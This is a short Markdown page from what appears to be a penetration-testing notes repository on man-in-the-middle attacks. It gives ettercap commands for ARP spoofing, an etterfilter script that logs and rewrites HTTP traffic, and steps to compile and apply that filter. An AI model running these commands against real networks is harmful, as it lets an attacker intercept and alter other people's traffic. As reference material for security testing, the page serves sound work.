killchain-compendium/post_exploitation/docs/mitm.md

32 lines
787 B
Markdown
Raw Normal View History

2021-10-23 02:03:06 +02:00
# Man In the Middle
* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)
2022-05-05 09:31:18 +02:00
* ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches
```sh
ettercap -T -i <interface> -M arp
```
2021-10-23 02:03:06 +02:00
2022-05-05 09:31:18 +02:00
* Etterfilter can filter and restructure packets
```sh
man etterfilter
```
```sh
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
log(DATA.data, "/tmp/ettercap.log");
replace("filename.html", "otherfilename.html" );
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```
* Escape double quote inside the payload string
* compile via
```sh
etterfilter filter.ef -o filter.ef
```
* Run the filter via
```sh
ettercap -T -i <interface> -M arp -F filter.ef
```